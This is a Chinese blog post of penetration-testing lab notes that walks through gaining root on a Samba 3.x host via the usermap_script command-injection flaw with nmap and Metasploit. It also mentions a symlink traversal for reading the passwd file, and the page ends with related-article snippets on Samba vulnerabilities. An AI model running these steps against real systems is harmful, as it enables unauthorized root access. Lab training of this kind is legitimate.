samba 3.x提权漏洞

最新推荐文章于 2024-05-11 22:55:30 发布
最新推荐文章于 2024-05-11 22:55:30 发布
阅读量1.2k 收藏 6
点赞数
分类专栏: 渗透学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39934520/article/details/108063018
版权

声明:以下内容均来自“实验吧”免费公益渗透平台,该平台至今仍旧在维护,估计~~,为此把以前保留的笔记拿来分享下。

[实验目的]

   1) 利用Samba漏洞,获得目标主机root权限

[实验原理]

   1) Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh.如果再调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了而已输入的话,就可能允许攻击者以nobody用户的权限执行任意命令.Samba服务端口:139\445.

[实验环境]

[实验步骤]

一、利用nmap工具扫描目标主机

1.1 在终端中输入命令"nmap -sV 192.168.1.3”, 对目标主机进行端口扫描,发现开放445端口、139端口并且安装samba软件。版本为3.x(注意此攻击也就适用于攻击3版本)
 

1.2 在终端中输入命令"msfconsole" , 启动MSF终端。

1.3 在终端中输入命令"search samba”, 搜索samba的相关I具和攻击载荷。

1.4 在终端中输入命令"use exploit/multi/samba/usermap_script" , 启用漏洞利用模块,提示符就会提示进入到该路径下。

1.5 在终端中输入命令"info” , 查看需要设置的相关项,"yes" 表示必须填写的参数。

#用命令show options看到更清楚

1.6 在终端中输入命令"set RHOST 192.168.1.3”, 设置目标主机的IP地址。

1.7 在终端中输入"exploit" 开始向目标 主机攻击,攻击成功后 ,建立会话。

1.8 在终端中输入,'whoami" ,查看获得的权限为root ,输入命令"ifconfig" ,查看系统的网络信息。

补充说明:

Metasploit溢出sysmlink 默认配置目录遍历漏洞,这个也是samba 3.x漏洞,具体过程自行百度:

其实验目的是:
1)利用sysmlink漏洞读取目标主机的passwd文件内容。
其实验原理是:
1) Samba是一套实现SMB ( server messages block )协议,跨平台进行文件共享和打印共享服务的程序, samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一
个对称命,创建-个包含. 的目录遍历符的软连接,可以进行目录遍历以及访问任意文件。
 

 

红烧兔纸
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Samba 3.x SWAT预验证远程缓冲区溢出漏洞[代码]
陈巍@人生态度
08-18 1491
受影响系统 Samba 3.0.2                Samba 3.0.3                Samba 3.0.4详细描述SWAT是Samba Web管理工具。 Samba SWAT服务预验证存在缓冲区溢出问题,远程攻击者可以利用这个漏洞在系统上以SWAT进程权限执行任意指令。问题存在于source/lib/util_str.c文件中的进行HTTP Basic验
文件共享服务的一些安全点
xnxqwzy的博客
08-16 464
文件共享是大家常用的一种功能,其实在win中的共享功能都是通过smb协议来完成。接下来看看文件共享有哪些需要注意的安全点,本文仅做一次记录,方便后续查看。
SambaMS-RPC Shell命令注入漏洞(CVE-2007-2447)
最新发布
m0_62670778的博客
05-11 378
Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源,还能与全世界的电脑分享资源。
Metasploit溢出samba提权漏洞
weixin_33862041的博客
12-09 713
Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一个对称命,创建一个包含..的目录遍历符的软连接 ,可以进行目录遍历以及访问任意文件。一、利用nmap工具扫描目标主机1.1使用nmap命令对目...
Metasploit学习笔记(三)——Samba 3.x服务漏洞复现
Zichel77的博客
10-07 677
享文件和打印机的通信协议,它在局域网内使用Linux和Windows系统的机器之间提供文件及打印机等资源的共享服务。尝试别的exploit或者payload也不太行,但这里主要是把过程过一遍,和永恒之蓝的利用步骤完全一样。因为目标是Linux机器,一定要选择Linux的攻击载荷,而且不是每个都有用的,可以一个个尝试一下。此步就是收集主机的信息,得知445端口开放,就可以利用基于该端口的相关漏洞。然后选择Rank为excellent并且时间较新的加以利用,以提高渗透成功率。本次利用选择的是13号。
CVE-2015-0240: Samba 漏洞提权风险
weixin_33850015的博客
06-06 325
Samba的守护进程smbd里有一个为初始化的指针可被远程漏洞利用,这个编号CVE-2015-0240的漏洞允许一个恶意的Samba客户端发送一个特定的netlogon数据包给smbd获得smbd运行的权限,而smbd的默认权限是root,这个漏洞影响了Samba 3.5和更新的版本,主流的GNU/Linux发行版都受到了影响,目前Debian已经修复。...
android4.0漏洞msf,Metasploit溢出samba提权漏洞
weixin_36307377的博客
06-03 483
Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一个对称命,创建一个包含..的目录遍历符的软连接 ,可以进行目录遍历以及访问任意文件。一、利用nmap工具扫描目标主机1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,...
Samba_3.x_4.x_Exploit:不使用Metasploit-Framework的Samba 3.x 4.x的利用
02-10
Samba_3.x_4.x_Exploit(SMB“用户名映射脚本”) 利用“ Samba用户名映射脚本命令执行”的Metasploit模块的python版本,我创建了该脚本以避免使用Metasploit,因为它对学习没有用。 :alien_monster:
samba 3.6.25
12-26
Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供...
samba-3.6.25.tar.gz
07-17
Samba是一款在Linux和UNIX操作系统上实现Server Message Block (SMB) 协议的开源软件,它使得非Windows系统能够无缝地与Windows网络共享资源。SMB协议是Microsoft开发的一种网络文件共享协议,广泛用于局域网内的...
samba.tar.gz
07-16
3. **Samba配置文件(smb.conf)**:这是Samba的核心配置文件,定义了共享的目录、用户权限、安全策略等。通过对smb.conf的精细调整,可以满足各种复杂的需求。 **Samba的安装与配置** 在大多数Linux发行版中,...
samba-4.13.3.tar.gz
12-25
Samba-4.13.3这个版本中,开发者可能已经修复了前一版本中发现的安全漏洞、性能问题和其他bug,同时也可能引入了一些新的特性和改进。例如,可能提高了与最新Windows系统的兼容性,增强了用户认证和权限管理,或者...
linux samba 漏洞 exp,第二课:Linux提权-依赖exp篇
weixin_29761519的博客
05-20 221
专注APT攻击与防御https://micropoor.blogspot.com/exp注:CVE-2017-1000367 [Sudo](Sudo 1.8.6p7 - 1.8.20)CVE-2017-1000112 [a memory corruption due to UFO to non-UFO path switch]CVE-2017-7494 [Samba Remote executio...
Samba3.X-Swat配置
weixin_34190136的博客
04-13 114
第一步:关闭Selinux [root@localhost ~]# vi /etc/selinux/config #ThisfilecontrolsthestateofSELinuxonthesystem. #SELINUX=cantakeoneofthesethreevalues: #enforcing-SE...
SMB信息泄露提权
weixin_45007073的博客
01-02 682
记录一下基于SMB信息泄露的提权过程 准备工作 镜像下载地址: 链接:https://pan.baidu.com/s/1eKjpvhczXESM1K7mqDv6Tw 提取码:bxps 攻击过程 使用netdiscover发现存活主机 netdidscover -i eth0 使用nmap扫描主机 发现目标主机开放了远程连接端口和smb、mysql服务端口 尝试登陆smb服务收集敏感信息,空指令登陆 访问共享目录,一步步地收集敏感信息 smbclient '\\192.168.75.153\p
共享服务器文件溢出,文件共享软件Samaba中发现缓冲区溢出漏洞
weixin_39551462的博客
08-10 579
【日经BP社报道】开发开放源码文件服务器软件Samba(英文)的Samaba Team于当地时间7月22日公布了在Samba中发现的安全漏洞。由于存在缓冲区溢出问题,可能导致远程运行任意代码。对策是升级至最新版的Samba 3.0.5或者2.2.10等。此次公布的漏洞有两种:一种存在于SWAT使用的功能中,Samba 3.0.2以后的版本都有(CAN-2004-0600(英文))。Samba Te...
【Centos5.x】Samba 3.x服务器预览
Angryn00b的专栏
08-20 773
Samba 主要功能: 共享文件与打印服务 提供登录Samba服务器客户主机验证 进行NetBIOS解析 设备共享(Zip, CD-ROM) Samba {可以实现 文件、设备的共享 也可以实现} | { 一个主域控制器 } Samba的daemon:     nmbd 管理工作组 NetBIOS解析              UDP 端口:137,138    s
一步一学Linux与Windows 共享文件Samba
冷剑魂的专栏——垃圾场
08-29 1402
一步一学Linux与Windows 共享文件Samba (v0.2b)作者:北南南北,正在增加中... ... 需要您的参与; 来自:LinuxSir.Org 简介:本文只是讲一讲我们最常用的Linux与Windows共享文件,主要是为新手指一指路。如何建立最简单的Samba服务器,并讲述遇到问题应该从何处寻找解决方案;正在更新之中,希望您的参加 ... ... 谢谢;目录
Samba服务安全漏洞复现及利用[CVE-2007-2447]
sGanYu
09-22 3802
模拟环境: 攻击工具:kali Linux/nmap/msfconsole 目标:metasploittable2/UNIX 一、使用nmap扫描网段内主机 命令:【nmap -sS -Pn 192.168.200.134】 注:-sS会使nmap执行一次隐秘的TCP扫描,以确定某个特定的TCP端口是否开放,-Pn会告知nmap不执行ping命令预先判断目标是否存活,而是默认主机为存活,也可以尝试使用-A选项 MSF内同样也支持nmap扫描,但是这里-sV会进行探测快放端口以及版本信息扫描 .
samba 4.14.5配置
12-09
Samba是一个开源的软件,用于在Linux和Unix系统上实现文件和打印服务。Samba 4.14.5是Samba的一个较新的版本,它提供了更多的功能和改进,比如支持更多的Windows客户端和更好的性能。 要配置Samba 4.14.5,首先需要在系统上安装Samba软件包。安装完成后,需要编辑Samba的配置文件,通常是位于/etc/samba/smb.conf。在配置文件中,可以设置共享目录的名称、路径、访问权限、以及可访问共享的用户或用户组。 在配置文件中,你还可以设置Samba服务器的工作组、域控制器、以及其他网络设置。另外,你还可以配置Samba的安全选项,比如使用用户账户验证、共享的访问权限等。 在配置完成后,需要重启Samba服务以使配置生效。可以使用命令"sudo systemctl restart smbd"来重启Samba服务。在重启后,Samba将会根据配置文件中的设置,提供文件和打印服务给客户端。 最后,在配置Samba时需要注意网络安全,确保只开放需要对外访问的端口和服务,同时配置好用户权限和访问控制,以确保数据的安全性。 总的来说,配置Samba 4.14.5需要对Samba的配置文件有一定的了解,以及对网络和安全有一定的认识。配置完毕后,Samba将能够为网络提供可靠的文件和打印服务。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值